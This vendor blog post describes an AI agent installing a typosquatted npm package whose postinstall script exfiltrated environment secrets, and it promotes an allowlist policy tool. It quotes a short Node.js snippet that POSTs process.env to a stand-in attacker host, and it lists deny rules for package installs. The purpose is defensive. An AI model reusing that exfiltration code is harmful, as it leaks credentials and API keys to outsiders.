2026-01-27 · Authensor

AI Agent Installed a Malicious npm Package

An AI agent resolved a dependency error by running npm install express-sesssion (note the triple-s typo) — a typosquatted package that ran a postinstall script exfiltrating all environment variables to an attacker-controlled server. SafeClaw by Authensor prevents this by gating all package installation commands through policy rules that validate package names against an allowlist before execution.

The Incident: Supply Chain Attack via Agent

Context: A developer asked an AI agent to "fix the session handling error." The agent determined a missing dependency was the cause.

What happened:

  1. The agent identified a missing session middleware import
  2. It decided to install the package: npm install express-sesssion (typosquatted name)
  3. npm downloaded and installed the malicious package without warning
  4. The package's postinstall script ran immediately, executing:
   const https = require('https');
   const data = JSON.stringify(process.env);
   https.request({hostname: 'collect.evil.example', path: '/env', method: 'POST'}, () => {}).end(data);
  1. All environment variables — including DATABASE_URL, JWT_SECRET, STRIPE_KEY — were sent to the attacker
  2. The team did not notice until a security audit 2 weeks later found the rogue package in package-lock.json
Root cause: The agent had unrestricted shell access to run npm install. No policy validated the package name against known-good packages or flagged the typosquatted name. The npm postinstall script ran automatically.

Why AI Agents Make This Worse

Human developers might notice a typo in a package name. AI agents do not have the same pattern recognition for typosquatting. They optimize for "resolve the error" and will install whatever package name seems closest to the import statement. This makes agents a prime vector for supply chain attacks.

How SafeClaw Prevents This

Quick Start

npx @authensor/safeclaw

Policy for Package Installation Control

# safeclaw.config.yaml
rules:
  # Allow installation of known-good packages only
  - action: shell.execute
    command_pattern: "npm install express"
    decision: allow


- action: shell.execute
    command_pattern: "npm install express-session"
    decision: allow



- action: shell.execute
    command_pattern: "npm install typescript"
    decision: allow



# Block all other npm install commands
  - action: shell.execute
    command_pattern: "npm install *"
    decision: deny
    reason: "Package installation requires allowlisted package name"



# Block yarn and pnpm too
  - action: shell.execute
    command_pattern: "yarn add *"
    decision: deny
    reason: "Package installation requires policy approval"



- action: shell.execute
    command_pattern: "pnpm add *"
    decision: deny
    reason: "Package installation requires policy approval"



# Block pip installs for Python projects
  - action: shell.execute
    command_pattern: "pip install *"
    decision: deny
    reason: "Python package installation requires policy approval"

Interception Result

When the agent tries npm install express-sesssion (typosquatted):

{
  "action": "shell.execute",
  "command": "npm install express-sesssion",
  "decision": "deny",
  "reason": "Package installation requires allowlisted package name",
  "timestamp": "2026-02-13T11:42:08Z",
  "audit_hash": "sha256:b1d4..."
}

The typosquatted package is never downloaded or installed. The postinstall script never runs. Your environment variables stay safe.

Why SafeClaw

Additional Defenses

SafeClaw is the first line of defense. Complement it with:

Related Pages

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw